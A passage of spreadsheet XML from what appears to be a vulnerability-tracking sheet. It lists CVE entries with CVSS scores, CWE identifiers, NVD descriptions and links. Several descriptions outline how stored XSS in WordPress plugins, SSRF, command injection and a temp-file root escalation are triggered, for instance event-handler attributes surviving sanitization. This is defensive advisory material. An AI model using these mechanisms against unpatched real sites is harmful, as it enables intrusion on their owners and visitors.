      <c r="M1201" s="5" t="inlineStr"/>
      <c r="N1201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1201" s="5" t="inlineStr"/>
      <c r="Q1201" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R1201"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S1201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1202" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85028</t>
        </is>
      </c>
      <c r="D1202" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1202" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G1202" s="5" t="inlineStr"/>
      <c r="H1202" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1202" s="5" t="inlineStr"/>
      <c r="J1202" s="5" t="inlineStr"/>
      <c r="K1202" s="5" t="inlineStr"/>
      <c r="L1202" s="5" t="inlineStr"/>
      <c r="M1202" s="5" t="inlineStr"/>
      <c r="N1202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1202" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1202" s="5" t="inlineStr"/>
      <c r="Q1202" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="R1202" s="5" t="inlineStr">
        <is>
          <t>Creation of a temporary file in a directory with insecure permissions in the FPGA management tool installation component in AWS FPGA Development Kit (aws-fpga) before 2.3.4 might allow local users to execute arbitrary code with root privileges via crafted shell content placed at a predictable path in a world-writable temporary directory, which the installation step reads after elevating its own privileges.
To remediate this issue, users should upgrade to version 2.3.4.</t>
        </is>
      </c>
      <c r="S1202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85028</t>
        </is>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86806</t>
        </is>
      </c>
      <c r="D1203" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1203" s="5" t="inlineStr"/>
      <c r="H1203" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1203" s="5" t="inlineStr"/>
      <c r="J1203" s="5" t="inlineStr"/>
      <c r="K1203" s="5" t="inlineStr"/>
      <c r="L1203" s="5" t="inlineStr"/>
      <c r="M1203" s="5" t="inlineStr"/>
      <c r="N1203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1203" s="5" t="inlineStr"/>
      <c r="Q1203" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1203" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in opengeos GeoLibre up to 2.3.0. Impacted is the function _is_within_roots. This manipulation causes server-side request forgery. The attack can be initiated remotely. Upgrading to version 2.4.0 is recommended to address this issue. Patch name: b745f62e29fa37364686525a21eee5e5c0f8a369. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t>
        </is>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1204" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15984</t>
        </is>
      </c>
      <c r="D1204" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1204" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1204" s="5" t="inlineStr"/>
      <c r="H1204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1204" s="5" t="inlineStr"/>
      <c r="J1204" s="5" t="inlineStr"/>
      <c r="K1204" s="5" t="inlineStr"/>
      <c r="L1204" s="5" t="inlineStr"/>
      <c r="M1204" s="5" t="inlineStr"/>
      <c r="N1204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1204" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1204" s="5" t="inlineStr"/>
      <c r="Q1204" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1204" s="5" t="inlineStr">
        <is>
          <t>The QuickCal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Custom Field Parameters in all versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce guarding the unauthenticated booked_add_appt AJAX action is publicly embedded on any page rendering the booking calendar shortcode, making it trivially obtainable by unauthenticated attackers without any prior account or privilege.</t>
        </is>
      </c>
      <c r="S1204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15984</t>
        </is>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1205" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16649</t>
        </is>
      </c>
      <c r="D1205" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1205" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1205" s="5" t="inlineStr"/>
      <c r="H1205" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1205" s="5" t="inlineStr"/>
      <c r="J1205" s="5" t="inlineStr"/>
      <c r="K1205" s="5" t="inlineStr"/>
      <c r="L1205" s="5" t="inlineStr"/>
      <c r="M1205" s="5" t="inlineStr"/>
      <c r="N1205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1205" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1205" s="5" t="inlineStr"/>
      <c r="Q1205" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1205" s="5" t="inlineStr">
        <is>
          <t>The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Post Body Field Value in all versions up to, and including, 2.10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit survives save-time sanitization because wp_kses_post allows the required HTML tags and attributes, and the client-side tooltip script re-parses the browser-decoded aria-label value as innerHTML while only stripping script elements, leaving onerror and other event-handler attributes fully intact and executable.</t>
        </is>
      </c>
      <c r="S1205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16649</t>
        </is>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1206" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18406</t>
        </is>
      </c>
      <c r="D1206" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1206" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1206" s="5" t="inlineStr"/>
      <c r="H1206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1206" s="5" t="inlineStr"/>
      <c r="J1206" s="5" t="inlineStr"/>
      <c r="K1206" s="5" t="inlineStr"/>
      <c r="L1206" s="5" t="inlineStr"/>
      <c r="M1206" s="5" t="inlineStr"/>
      <c r="N1206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1206" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1206" s="5" t="inlineStr"/>
      <c r="Q1206" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1206" s="5" t="inlineStr">
        <is>
          <t>The SureForms – Contact Form Builder, AI Forms, Payment Form, Survey &amp; Quiz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Text Field Entity-Encoded Payload in all versions up to, and including, 2.12.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S1206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18406</t>
        </is>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1207" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19224</t>
        </is>
      </c>
      <c r="D1207" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1207" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1207" s="5" t="inlineStr"/>
      <c r="H1207" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1207" s="5" t="inlineStr"/>
      <c r="J1207" s="5" t="inlineStr"/>
      <c r="K1207" s="5" t="inlineStr"/>
      <c r="L1207" s="5" t="inlineStr"/>
      <c r="M1207" s="5" t="inlineStr"/>
      <c r="N1207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1207" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1207" s="5" t="inlineStr"/>
      <c r="Q1207" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R1207" s="5" t="inlineStr">
        <is>
          <t>The Hummingbird Performance  WordPress plugin before 3.21.2 does not restrict a network-wide setting to network administrators, allowing an administrator of any single site on a multisite network to execute arbitrary code across the entire network.</t>
        </is>
      </c>
      <c r="S1207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19224</t>
        </is>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1208" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19769</t>
        </is>
      </c>
      <c r="D1208" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1208" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1208" s="5" t="inlineStr"/>
      <c r="H1208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1208" s="5" t="inlineStr"/>
      <c r="J1208" s="5" t="inlineStr"/>
      <c r="K1208" s="5" t="inlineStr"/>
      <c r="L1208" s="5" t="inlineStr"/>
      <c r="M1208" s="5" t="inlineStr"/>
      <c r="N1208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1208" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1208" s="5" t="inlineStr"/>
      <c r="Q1208" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1208" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Child 'type' Confusion via Unmatched Array Key in all versions up to, and including, 3.15.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the Ninja Forms File Uploads add-on to be active, as the attack routes the unwhitelisted child entry through the File Uploads handler to write an attacker-supplied HTML file containing arbitrary JavaScript into any web-server-writable directory, including the site root, where it is served from the site's own origin.</t>
        </is>
      </c>
      <c r="S1208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19769</t>
        </is>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1209" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34968</t>
        </is>
      </c>
      <c r="D1209" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1209" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1209" s="5" t="inlineStr"/>
      <c r="H1209" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1209" s="5" t="inlineStr"/>
      <c r="J1209" s="5" t="inlineStr"/>
      <c r="K1209" s="5" t="inlineStr"/>
      <c r="L1209" s="5" t="inlineStr"/>
      <c r="M1209" s="5" t="inlineStr"/>
      <c r="N1209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1209" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1209" s="5" t="inlineStr"/>
      <c r="Q1209" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1209" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 contains an arbitrary file deletion vulnerability in SQLite mode where the database-list drop action fails to validate file extensions before deletion. An authenticated attacker can submit arbitrary relative file paths in the db[] parameter to delete any files writable by the PHP process.</t>
        </is>
      </c>
      <c r="S1209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34968</t>
        </is>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1210" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71506</t>
        </is>
      </c>
      <c r="D1210" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1210" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1210" s="5" t="inlineStr"/>
      <c r="H1210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1210" s="5" t="inlineStr"/>
      <c r="J1210" s="5" t="inlineStr"/>
      <c r="K1210" s="5" t="inlineStr"/>
      <c r="L1210" s="5" t="inlineStr"/>
      <c r="M1210" s="5" t="inlineStr"/>
      <c r="N1210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1210" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1210" s="5" t="inlineStr"/>
      <c r="Q1210" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1210" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the payments REST API delete endpoint that allows authenticated attackers with invoice-deletion rights to permanently delete any payment record by bypassing the intended payment-issuance rights check. Attackers can exploit this misconfigured permission check to zero paid amounts on invoices and remove entries from accounting exports, causing financial data integrity loss.</t>
        </is>
      </c>
      <c r="S1210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71506</t>
        </is>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76561</t>
        </is>
      </c>
      <c r="D1211" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1211" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1211" s="5" t="inlineStr"/>
      <c r="H1211" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1211" s="5" t="inlineStr"/>
      <c r="J1211" s="5" t="inlineStr"/>
      <c r="K1211" s="5" t="inlineStr"/>
      <c r="L1211" s="5" t="inlineStr"/>
      <c r="M1211" s="5" t="inlineStr"/>
      <c r="N1211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1211" s="5" t="inlineStr"/>
      <c r="Q1211" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R1211" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Dogtag PKI, as used by FreeIPA's certificate authority component. The certificate profile import functionality does not fully validate uploaded profile content beyond the profile ID. An authenticated user with CA Administrator privileges can exploit Dogtag's ExternalProcessConstraint mechanism to execute arbitrary commands with attacker-controlled environment variables, achieving code execution as the pkiuser account.</t>
        </is>
      </c>
      <c r="S1211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t>
        </is>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1212" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77233</t>
        </is>
      </c>
      <c r="D1212" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1212" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1212" s="5" t="inlineStr"/>
      <c r="H1212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1212" s="5" t="inlineStr"/>
      <c r="J1212" s="5" t="inlineStr"/>
      <c r="K1212" s="5" t="inlineStr"/>
      <c r="L1212" s="5" t="inlineStr"/>
      <c r="M1212" s="5" t="inlineStr"/>
      <c r="N1212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1212" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1212" s="5" t="inlineStr"/>
      <c r="Q1212" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1212" s="5" t="inlineStr">
        <is>
          <t>The iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via AdSense Regex Rewrite in all versions up to, and including, 3.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability only manifests when the 'Secondary' parser engine is active (parser_engine=default); it does not exist under the default 'new' DOM-based parser engine.</t>
        </is>
      </c>
      <c r="S1212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77233</t>
        </is>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1213" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77263</t>
        </is>
      </c>
      <c r="D1213" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1213" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1213" s="5" t="inlineStr"/>
      <c r="H1213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1213" s="5" t="inlineStr"/>
      <c r="J1213" s="5" t="inlineStr"/>
      <c r="K1213" s="5" t="inlineStr"/>
      <c r="L1213" s="5" t="inlineStr"/>
      <c r="M1213" s="5" t="inlineStr"/>
      <c r="N1213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1213" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1213" s="5" t="inlineStr"/>
      <c r="Q1213" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1213" s="5" t="inlineStr">
        <is>
          <t>The iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content in all versions up to, and including, 3.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit works by embedding KSES-allowed markup such as abbr title attributes and HTML comments in a submitted comment so that the global strtr() substitution strips substrings from an inert tag, mutating it into an executable element such as an img onerror handler that runs in the WordPress origin for any visitor, including logged-in administrators.</t>
        </is>
      </c>
      <c r="S1213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77263</t>
        </is>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1214" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77830</t>
        </is>
      </c>
      <c r="D1214" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1214" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1214" s="5" t="inlineStr"/>
      <c r="H1214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1214" s="5" t="inlineStr"/>
      <c r="J1214" s="5" t="inlineStr"/>
      <c r="K1214" s="5" t="inlineStr"/>
      <c r="L1214" s="5" t="inlineStr"/>
      <c r="M1214" s="5" t="inlineStr"/>
      <c r="N1214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1214" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1214" s="5" t="inlineStr"/>
      <c r="Q1214" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1214" s="5" t="inlineStr">
        <is>
          <t>The Spam protection, Honeypot, Anti-Spam by CleanTalk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content aria-label Placeholder in all versions up to, and including, 6.86 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is deliverable via unauthenticated comment submission and executes exclusively for non-logged-in visitors; if comment moderation is enabled, an approving moderator must first publish the comment before the script reaches other users.</t>
        </is>
      </c>
      <c r="S1214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77830</t>
        </is>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1215" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78438</t>
        </is>
      </c>
      <c r="D1215" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1215" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1215" s="5" t="inlineStr"/>
      <c r="H1215" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1215" s="5" t="inlineStr"/>
      <c r="J1215" s="5" t="inlineStr"/>
      <c r="K1215" s="5" t="inlineStr"/>
      <c r="L1215" s="5" t="inlineStr"/>
      <c r="M1215" s="5" t="inlineStr"/>
      <c r="N1215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1215" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1215" s="5" t="inlineStr"/>
      <c r="Q1215" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1215" s="5" t="inlineStr">
        <is>
          <t>The W3 Total Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via LazyLoad Background Mutator in all versions up to, and including, 2.10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the "Lazy Load Images" feature with "Process background images" to be enabled, and the malicious comment to be approved by a moderator before execution is triggered.</t>
        </is>
      </c>
      <c r="S1215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78438</t>
        </is>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81349</t>
        </is>
      </c>
      <c r="D1216" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1216" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1216" s="5" t="inlineStr"/>
      <c r="H1216" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1216" s="5" t="inlineStr"/>
      <c r="J1216" s="5" t="inlineStr"/>
      <c r="K1216" s="5" t="inlineStr"/>
      <c r="L1216" s="5" t="inlineStr"/>
      <c r="M1216" s="5" t="inlineStr"/>
      <c r="N1216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1216" s="5" t="inlineStr"/>
      <c r="Q1216" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R1216" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t>
        </is>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81806</t>
        </is>
      </c>
      <c r="D1217" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1217" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1217" s="5" t="inlineStr"/>
      <c r="H1217" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1217" s="5" t="inlineStr"/>
      <c r="J1217" s="5" t="inlineStr"/>
      <c r="K1217" s="5" t="inlineStr"/>
      <c r="L1217" s="5" t="inlineStr"/>
      <c r="M1217" s="5" t="inlineStr"/>
